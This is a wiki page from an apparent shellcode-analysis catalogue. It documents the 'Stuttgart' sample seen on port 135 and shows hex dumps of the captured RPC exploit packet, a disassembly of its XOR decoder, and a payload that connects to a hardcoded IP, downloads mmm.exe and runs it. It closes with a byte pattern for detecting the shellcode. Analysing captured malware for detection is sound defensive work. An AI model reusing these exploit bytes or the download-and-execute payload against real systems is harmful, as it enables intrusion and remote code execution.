[[csni:shellcodes:stuttgart]]
 
Trace: home » csni » shellcodes » stuttgart
Table of Contents

Stuttgart Shellcode

This problem is resolved. Port: 135
Codename: Stuttgart
Reference: cdac1b24863204a32a63dc6222870933.bin

Shellcode

raw 

/*
00000000  05 00 00 03 10 00 00 00  8a 06 00 00 00 00 00 00  |................|
00000010  72 06 00 00 00 00 00 00  05 00 01 00 00 00 00 00  |r...............|
00000020  00 00 00 00 58 7d 75 75  40 eb c6 47 bc 71 4e a7  |....X}uu@..G.qN.|
00000030  1c d0 b5 97 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000040  00 00 00 00 00 00 00 00  00 00 09 00 00 03 00 00  |................|
00000050  00 00 00 00 00 03 00 00  5c 00 5c 00 90 90 90 90  |........\.\.....|
00000060  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000070  90 90 90 90 90 90 90 90  90 90 90 90 eb 10 eb 19  |................|
00000080  9f 75 18 00 23 37 f3 77  eb e0 fd 7f 90 90 90 90  |.u..#7.w........|
00000090  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
000000e0  90 90 90 90 eb 04 ff ff  ff ff 90 90 90 90 90 90  |................|
000000f0  90 90 eb 04 eb 04 90 90  90 90 eb 04 ff ff ff ff  |................|
00000100  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000370  90 90 90 90 90 90 90 eb  15 b9 8b e6 13 41 81 f1  |.............A..|
00000380  d8 e7 13 41 5e 80 74 31  ff a2 e2 f9 eb 05 e8 e6  |...A^.t1........|
00000390  ff ff ff 91 79 c6 29 e1  92 29 e2 ae 29 d2 be 0f  |....y.)..)..)...|
000003a0  29 e2 aa f1 f1 ca 91 90  a2 a2 ca d5 d1 90 fd ca  |)...............|
000003b0  d0 d6 a2 a2 ca cf d1 d4  c1 4a 96 a2 a2 a2 a3 a2  |.........J......|
000003c0  a2 a2 97 c0 aa 74 d6 81  82 36 62 3b 6b 68 1b fe  |.....t...6b;kh..|
000003d0  b7 cb 1b e2 54 e2 75 a0  11 af 27 5b ef 66 3e b8  |....T.u...'[.f>.|
000003e0  a6 ba 21 a3 71 b8 62 a0  b1 a5 22 96 a1 a5 16 28  |..!.q.b..."....(|
000003f0  9b 8a ff c8 a0 f9 29 5a  f1 f1 29 f5 9e 29 f6 98  |......)Z..)..)..|
00000400  da a1 75 f0 29 f0 82 a1  75 91 79 e1 29 96 38 a1  |..u.)...u.y.).8.|
00000410  55 91 6b 0e 90 6a 63 63  a7 0e 26 62 d7 54 29 d7  |U.k..jcc..&b.T).|
00000420  a2 89 ee 17 a2 d7 46 25  96 86 29 f4 86 a1 75 c4  |......F%..)...u.|
00000430  29 ae f8 29 f4 be a1 75  29 a6 28 a1 65 fc 2b e6  |)..)...u).(.e.+.|
00000440  17 a2 5d e7 a2 f9 e9 d7  12 f9 21 61 a0 f6 5d f7  |..].......!a..].|
00000450  aa 21 66 aa 27 62 d7 3c  16 a0 89 42 28 66 f6 f2  |.!f.'b.<...B(f..|
00000460  5d f7 be f2 f2 ca f6 0f  d6 49 ca a0 a2 88 37 29  |]........I....7)|
00000470  5e f2 c8 a3 c8 a0 5d f7  82 29 7a c8 b2 f5 f1 5d  |^.....]..)z....]|
00000480  f7 86 27 62 d7 fb 65 e7  a2 a1 a2 a2 a2 f2 c8 a6  |..'b..e.........|
00000490  f7 f1 5d f7 8e 29 56 65  e7 a2 d5 c0 a2 a2 ca c7  |..]..)Ve........|
000004a0  da c7 a2 ca d8 d8 d8 8c  29 5e f7 f5 5d f7 ae 2b  |........)^..]..+|
000004b0  e7 a2 c8 a2 ca a2 a0 a2  a2 f4 f1 5d f7 8a 27 62  |...........]..'b|
000004c0  d6 b3 da b9 5d d7 a2 f2  c8 a3 f4 5d f7 b2 21 66  |....]......]..!f|
000004d0  b2 49 7d 5d d7 a2 5d f7  b6 f2 f6 f5 5d f7 ba f1  |.I}]..].....]...|
000004e0  5d f7 92 5d f7 a6 62 62  62 62 62 62 62 62 62 62  |]..]..bbbbbbbbbb|
000004f0  62 62 62 62 62 62 62 62  62 62 62 62 62 62 62 62  |bbbbbbbbbbbbbbbb|
*
000005d0  62 62 8b 45 30 05 24 fb  ff ff ff e0 eb f4 62 62  |bb.E0.$.......bb|
000005e0  0b 0b 1b 00 62 62 62 62  62 62 62 62 62 62 62 62  |....bbbbbbbbbbbb|
000005f0  62 62 62 62 62 62 62 62  62 62 62 62 62 62 62 62  |bbbbbbbbbbbbbbbb|
*
00000610  62 62 62 62 62 62 62 62  eb 06 62 62 59 1c 00 01  |bbbbbbbb..bbY...|
00000620  8b 44 24 fc 05 e0 fa ff  ff ff e0 62 62 62 62 62  |.D$........bbbbb|
00000630  62 62 62 62 62 62 62 62  62 62 62 62 62 62 62 62  |bbbbbbbbbbbbbbbb|
00000640  62 62 62 62 62 62 62 62  62 62 62 62 62 62 5c 00  |bbbbbbbbbbbbbb\.|
00000650  41 00 00 00 00 00 00 00  00 00 00 00 02 00 00 00  |A...............|
00000660  00 00 00 00 01 00 00 00  68 1c 09 00 01 00 00 00  |........h.......|
00000670  00 00 00 00 00 00 00 00  c0 00 00 00 00 00 00 46  |...............F|
00000680  01 00 00 00 01 00 00 00  07 00                    |..........|
0000068a


00000000  05 00 00 03 10 00 00 00  8a 06 00 00 00 00 00 00  |................|
00000010  72 06 00 00 00 00 00 00  05 00 01 00 00 00 00 00  |r...............|
00000020  00 00 00 00 58 7d 75 75  40 eb c6 47 bc 71 4e a7  |....X}uu@..G.qN.|
00000030  1c d0 b5 97 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000040  00 00 00 00 00 00 00 00  00 00 09 00 00 03 00 00  |................|
00000050  00 00 00 00 00 03 00 00  5c 00 5c 00 90 90 90 90  |........\.\.....|
00000060  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000070  90 90 90 90 90 90 90 90  90 90 90 90 eb 10 eb 19  |................|
00000080  9f 75 18 00 23 37 f3 77  eb e0 fd 7f 90 90 90 90  |.u..#7.w........|
00000090  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
000000e0  90 90 90 90 eb 04 ff ff  ff ff 90 90 90 90 90 90  |................|
000000f0  90 90 eb 04 eb 04 90 90  90 90 eb 04 ff ff ff ff  |................|
00000100  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000370  90 90 90 90 90 90 90 eb  15 b9 8b e6 13 41 81 f1  |.............A..|
00000380  d8 e7 13 41 5e 80 74 31  ff a2 e2 f9 eb 05 e8 e6  |...A^.t1........|
00000390  ff ff ff 91 79 c6 29 e1  92 29 e2 ae 29 d2 be 0f  |....y.)..)..)...|
000003a0  29 e2 aa f1 f1 ca 91 90  a2 a2 ca d5 d1 90 fd ca  |)...............|
000003b0  d0 d6 a2 a2 ca cf d1 d4  c1 4a 96 a2 a2 a2 a3 a2  |.........J......|
000003c0  a2 a2 97 c0 aa 74 d6 81  82 36 62 3b 6b 68 1b fe  |.....t...6b;kh..|
000003d0  b7 cb 1b e2 54 e2 75 a0  11 af 27 5b ef 66 3e b8  |....T.u...'[.f>.|
000003e0  a6 ba 21 a3 71 b8 62 a0  b1 a5 22 96 a1 a5 16 28  |..!.q.b..."....(|
000003f0  9b 8a ff c8 a0 f9 29 5a  f1 f1 29 f5 9e 29 f6 98  |......)Z..)..)..|
00000400  da a1 75 f0 29 f0 82 a1  75 91 79 e1 29 96 38 a1  |..u.)...u.y.).8.|
00000410  55 91 6b 0e 90 6a 63 63  a7 0e 26 62 d7 54 29 d7  |U.k..jcc..&b.T).|
00000420  a2 89 ee 17 a2 d7 46 25  96 86 29 f4 86 a1 75 c4  |......F%..)...u.|
00000430  29 ae f8 29 f4 be a1 75  29 a6 28 a1 65 fc 2b e6  |)..)...u).(.e.+.|
00000440  17 a2 5d e7 a2 f9 e9 d7  12 f9 21 61 a0 f6 5d f7  |..].......!a..].|
00000450  aa 21 66 aa 27 62 d7 3c  16 a0 89 42 28 66 f6 f2  |.!f.'b.<...B(f..|
00000460  5d f7 be f2 f2 ca f6 0f  94 0b ca a0 a2 6d 59 29  |]............mY)|
00000470  5e f2 c8 a3 c8 a0 5d f7  82 29 7a c8 b2 f5 f1 5d  |^.....]..)z....]|
00000480  f7 86 27 62 d7 fb 65 e7  a2 a4 a2 a2 a2 f2 c8 a6  |..'b..e.........|
00000490  f7 f1 5d f7 8e 29 56 65  e7 a2 d5 c0 a2 a2 ca c7  |..]..)Ve........|
000004a0  da c7 a2 ca cf cf cf 8c  29 5e f7 f5 5d f7 ae 2b  |........)^..]..+|
000004b0  e7 a2 c8 a2 ca a2 a0 a2  a2 f4 f1 5d f7 8a 27 62  |...........]..'b|
000004c0  d6 b3 da b9 5d d7 a2 f2  c8 a3 f4 5d f7 b2 21 66  |....]......]..!f|
000004d0  b2 49 7d 5d d7 a2 5d f7  b6 f2 f6 f5 5d f7 ba f1  |.I}]..].....]...|
000004e0  5d f7 92 5d f7 a6 76 76  76 76 76 76 76 76 76 76  |]..]..vvvvvvvvvv|
000004f0  76 76 76 76 76 76 76 76  76 76 76 76 76 76 76 76  |vvvvvvvvvvvvvvvv|
*
000005d0  76 76 8b 45 30 05 24 fb  ff ff ff e0 eb f4 76 76  |vv.E0.$.......vv|
000005e0  0b 0b 1b 00 76 76 76 76  76 76 76 76 76 76 76 76  |....vvvvvvvvvvvv|
000005f0  76 76 76 76 76 76 76 76  76 76 76 76 76 76 76 76  |vvvvvvvvvvvvvvvv|
*
00000610  76 76 76 76 76 76 76 76  eb 06 76 76 59 1c 00 01  |vvvvvvvv..vvY...|
00000620  8b 44 24 fc 05 e0 fa ff  ff ff e0 76 76 76 76 76  |.D$........vvvvv|
00000630  76 76 76 76 76 76 76 76  76 76 76 76 76 76 76 76  |vvvvvvvvvvvvvvvv|
00000640  76 76 76 76 76 76 76 76  76 76 76 76 76 76 5c 00  |vvvvvvvvvvvvvv\.|
00000650  41 00 00 00 00 00 00 00  00 00 00 00 02 00 00 00  |A...............|
00000660  00 00 00 00 01 00 00 00  68 1c 09 00 01 00 00 00  |........h.......|
00000670  00 00 00 00 00 00 00 00  c0 00 00 00 00 00 00 46  |...............F|
00000680  01 00 00 00 01 00 00 00  07 00                    |..........|
0000068a

unxor'd

FIXME

Analysis

xor decoder 

00402007   eb 15            jmp short stuttgar.0040201e
00402009   b9 8be61341      mov ecx,4113e68b
0040200e   81f1 d8e71341    xor ecx,4113e7d8
00402014   5e               pop esi
00402015   807431 ff a2     xor byte ptr ds:[ecx+esi-1],0a2
0040201a  ^e2 f9            loopd short stuttgar.00402015

unxor'd shellcode 

0040201c   eb 05            jmp short stuttgar.00402023
0040201e   e8 e6ffffff      call stuttgar.00402009
00402023   33db             xor ebx,ebx

00402025   64:8b43 30       mov eax,dword ptr fs:[ebx+30]
00402029   8b40 0c          mov eax,dword ptr ds:[eax+c]
0040202c   8b70 1c          mov esi,dword ptr ds:[eax+1c]
0040202f   ad               lods dword ptr ds:[esi]
00402030   8b40 08          mov eax,dword ptr ds:[eax+8]
00402033   53               push ebx
00402034   53               push ebx
00402035   68 33320000      push 3233
0040203a   68 7773325f      push 5f327377
0040203f   68 72740000      push 7472
00402044   68 6d737663      push 6376736d
00402049   e8 34000000      call stuttgar.00402082
0040204e   d0b6 0378e275    sal byte ptr ds:[esi+75e27803],1         ; --------- no code below
00402054   e7 77            out 77,eax                               ; i/o command
00402056   54               push esp
00402057   a2 e777c21b      mov byte ptr ds:[1bc277e7],al
0040205c   0278 9c          add bh,byte ptr ds:[eax-64]
0040205f   40               inc eax
00402060   0278 b8          add bh,byte ptr ds:[eax-48]
00402063   0e               push cs
00402064   0178 54          add dword ptr ds:[eax+54],edi
00402067   8c01             mov word ptr ds:[ecx],es
00402069   78 15            js short stuttgar.00402080
0040206b   3e:fa            cli                                      ; superfluous prefix
0040206d  ^74 f4            je short stuttgar.00402063
0040206f   1e               push ds
00402070   fa               cli
00402071   74 53            je short stuttgar.004020c6
00402073   c4fa             les edi,edx                              ; illegal use of register
00402075  ^74 ae            je short stuttgar.00402025
00402077   a1 fa740fc1      mov eax,dword ptr ds:[c10f74fa]
0040207c   fa               cli
0040207d  ^74 b6            je short stuttgar.00402035
0040207f   13fa             adc edi,edx
00402081   74 5d            je short stuttgar.004020e0
00402083   6a 02            push 2
00402085   5b               pop ebx
00402086   8bf8             mov edi,eax
00402088   53               push ebx
00402089   53               push ebx
0040208a   8b57 3c          mov edx,dword ptr ds:[edi+3c]
0040208d   8b543a 78        mov edx,dword ptr ds:[edx+edi+78]
00402091   03d7             add edx,edi
00402093   52               push edx
00402094   8b52 20          mov edx,dword ptr ds:[edx+20]
00402097   03d7             add edx,edi
00402099   33db             xor ebx,ebx
0040209b   43               inc ebx
0040209c   8b349a           mov esi,dword ptr ds:[edx+ebx*4]
0040209f   03f7             add esi,edi
004020a1   33c9             xor ecx,ecx
004020a3   ac               lods byte ptr ds:[esi]
004020a4   32c8             xor cl,al
004020a6   c1c1 05          rol ecx,5
004020a9   ac               lods byte ptr ds:[esi]
004020aa   84c0             test al,al
004020ac  ^75 f6            jnz short stuttgar.004020a4
004020ae   8b75 00          mov esi,dword ptr ss:[ebp]
004020b1   2b4cb5 00        sub ecx,dword ptr ss:[ebp+esi*4]
004020b5  ^75 e4            jnz short stuttgar.0040209b
004020b7   873424           xchg dword ptr ss:[esp],esi
004020ba   8b56 24          mov edx,dword ptr ds:[esi+24]
004020bd   03d7             add edx,edi
004020bf   66:8b0c5a        mov cx,word ptr ds:[edx+ebx*2]
004020c3   8b56 1c          mov edx,dword ptr ds:[esi+1c]
004020c6   03d7             add edx,edi
004020c8   8b048a           mov eax,dword ptr ds:[edx+ecx*4]
004020cb   03c7             add eax,edi
004020cd   5e               pop esi
004020ce   8944b5 00        mov dword ptr ss:[ebp+esi*4],eax
004020d2   ff45 00          inc dword ptr ss:[ebp]
004020d5   5b               pop ebx
004020d6   4b               dec ebx
004020d7  ^75 b0            jnz short stuttgar.00402089
004020d9   5b               pop ebx
004020da   83c3 02          add ebx,2
004020dd   54               push esp
004020de   ff55 08          call dword ptr ss:[ebp+8]
004020e1   83c4 08          add esp,8
004020e4   85c0             test eax,eax
004020e6  ^75 9e            jnz short stuttgar.00402086
004020e8   b4 02            mov ah,2
004020ea   2be0             sub esp,eax
004020ec   8ac4             mov al,ah
004020ee   54               push esp
004020ef   50               push eax
004020f0   ff55 1c          call dword ptr ss:[ebp+1c]               ; wsastartup
004020f3   50               push eax
004020f4   50               push eax
004020f5   68 54a654c2      push c254a654                            ; ip
004020fa   68 0200c50d      push 0dc50002                            ; port
004020ff   8bfc             mov edi,esp
00402101   50               push eax
00402102   6a 01            push 1
00402104   6a 02            push 2
00402106   ff55 20          call dword ptr ss:[ebp+20]               ; socket
00402109   8bd8             mov ebx,eax
0040210b   6a 10            push 10
0040210d   57               push edi
0040210e   53               push ebx
0040210f   ff55 24          call dword ptr ss:[ebp+24]               ; connect
00402112   85c0             test eax,eax
00402114   75 59            jnz short stuttgar.0040216f
00402116   c745 00 03000000 mov dword ptr ss:[ebp],3
0040211d   50               push eax
0040211e   6a 04            push 4
00402120   55               push ebp
00402121   53               push ebx
00402122   ff55 2c          call dword ptr ss:[ebp+2c]               ; send
00402125   8bf4             mov esi,esp
00402127   c745 00 77620000 mov dword ptr ss:[ebp],6277
0040212e   68 65786500      push 657865
00402133   68 6d6d6d2e      push 2e6d6d6d
00402138   8bfc             mov edi,esp
0040213a   55               push ebp
0040213b   57               push edi
0040213c   ff55 0c          call dword ptr ss:[ebp+c]                ; fopen // mmm.exe
0040213f   8945 00          mov dword ptr ss:[ebp],eax
00402142   6a 00            push 0
00402144   68 00020000      push 200
00402149   56               push esi
0040214a   53               push ebx
0040214b   ff55 28          call dword ptr ss:[ebp+28]               ; recv
0040214e   85c0             test eax,eax
00402150   74 11            je short stuttgar.00402163
00402152   78 1b            js short stuttgar.0040216f
00402154   ff75 00          push dword ptr ss:[ebp]
00402157   50               push eax
00402158   6a 01            push 1
0040215a   56               push esi
0040215b   ff55 10          call dword ptr ss:[ebp+10]               ; fwrite
0040215e   83c4 10          add esp,10
00402161  ^eb df            jmp short stuttgar.00402142
00402163   ff75 00          push dword ptr ss:[ebp]
00402166   ff55 14          call dword ptr ss:[ebp+14]               ; fclose
00402169   50               push eax
0040216a   54               push esp
0040216b   57               push edi
0040216c   ff55 18          call dword ptr ss:[ebp+18]               ; _execv
0040216f   53               push ebx                                 ; error/end
00402170   ff55 30          call dword ptr ss:[ebp+30]
00402173   ff55 04          call dword ptr ss:[ebp+4]

Pattern 

const char *stuttgart =
	"\\x50\\x50\\x68(....)\\x68\\x02\\x00"
	"(..)\\x8B\\xFC\\x50\\x6A\\x01\\x6A\\x02\\xFF"
	"\\x55\\x20\\x8B\\xD8\\x6A\\x10\\x57\\x53\\xFF\\x55"
	"\\x24\\x85\\xC0\\x75\\x59\\xC7\\x45\\x00(....)"
	"\\x50\\x6A\\x04\\x55\\x53\\xFF\\x55\\x2C";
 
csni/shellcodes/stuttgart.txt · Last modified: 2006/02/17 14:01
 
Recent changes RSS feed Creative Commons License Donate Powered by PHP Valid XHTML 1.0 Valid CSS Driven by DokuWiki